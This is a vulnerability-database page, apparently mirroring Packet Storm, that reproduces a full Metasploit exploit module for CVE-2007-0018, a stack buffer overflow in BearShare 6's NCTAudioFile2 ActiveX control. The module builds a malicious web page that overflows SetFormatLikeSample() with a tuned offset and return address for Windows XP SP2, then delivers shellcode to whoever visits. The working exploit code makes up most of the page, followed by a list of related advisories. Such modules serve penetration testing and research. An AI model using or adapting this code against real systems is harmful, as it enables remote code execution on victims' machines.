Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMCPACKETSTORM:83184
HistoryNov 26, 2009 - 12:00 a.m.

BearShare 6 ActiveX Control Buffer Overflow

2009-11-2600:00:00
MC
packetstormsecurity.com
17

0.952 High

EPSS

Percentile

99.4%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::HttpServer::HTML  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'BearShare 6 ActiveX Control Buffer Overflow',  
'Description' => %q{  
This module exploits a stack overflow in the NCTAudioFile2.Audio ActiveX  
Control provided by BearShare 6.0.2.26789. By sending a overly long string   
to the "SetFormatLikeSample()" method, an attacker may be able to execute arbitrary code.  
},  
'License' => MSF_LICENSE,  
'Author' => [ 'MC' ],   
'Version' => '$Revision$',  
'References' =>   
[  
[ 'CVE', '2007-0018' ],  
[ 'OSVDB', '32032' ],  
[ 'BID', '23892' ],  
[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/062911.html' ],  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 800,  
'BadChars' => "\x00\x09\x0a\x0d'\\",  
'StackAdjustment' => -3500,  
},  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Windows XP SP2 Pro English', { 'Offset' => 4116, 'Ret' => 0x7c81518B } ],  
],  
'DisclosureDate' => 'May 5 2007',  
'DefaultTarget' => 0))  
end  
  
def on_request_uri(cli, request)  
# Re-generate the payload  
return if ((p = regenerate_payload(cli)) == nil)  
  
# Randomize some things  
vname = rand_text_alpha(rand(100) + 1)  
strname = rand_text_alpha(rand(100) + 1)  
  
# Set the exploit buffer   
sploit = rand_text_alpha(target['Offset']) + [target.ret].pack('V')   
sploit << make_nops(8) + p.encoded   
  
# Build out the message  
content = %Q|  
<html>  
<object classid='clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC' id='#{vname}'></object>  
<script language='javascript'>  
var #{vname} = document.getElementById('#{vname}');  
var #{strname} = new String('#{sploit}');  
#{vname}.SetFormatLikeSample(#{strname});   
</script>  
</html>  
|  
  
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")  
  
# Transmit the response to the client  
send_response_html(cli, content)  
  
# Handle the payload  
handler(cli)  
end  
  
end  
`

Related

cert 1
packetstorm 1
checkpoint_advisories 1
securityvulns 5
cvelist 1
kaspersky 1
prion 1
nvd 1
cve 1
cert
cert
Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow
2007-01-24 00:00:00
packetstorm
packetstorm
NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow
2009-12-31 00:00:00
checkpoint_advisories
checkpoint_advisories
Multiple Products NCTAudioFile2 ActiveX Control Buffer Overflow (CVE-2007-0018)
2011-11-15 00:00:00
securityvulns
securityvulns
Sienzo Digital Music Mentor ActiveX buffer overflow
2007-01-24 00:00:00
[Full-disclosure] Secunia Research: NCTsoft Products NCTAudioFile2 ActiveX Control Buffer Overflow
2007-01-24 00:00:00
NCTsoft multiple applications ActiveX buffer overflow
2007-05-11 00:00:00
cvelist
cvelist
CVE-2007-0018
2007-01-24 21:00:00
kaspersky
kaspersky
KLA10252 ACE vulnerability in multiple software
2007-01-24 00:00:00
prion
prion
Stack overflow
2007-01-24 21:28:00
nvd
nvd
CVE-2007-0018
2007-01-24 21:28:00
cve
cve
CVE-2007-0018
2007-01-24 21:28:00

0.952 High

EPSS

Percentile

99.4%

JSON
Related for PACKETSTORM:83184
cert1packetstorm1checkpoint_advisories1securityvulns5cvelist1kaspersky1prion1nvd1cve1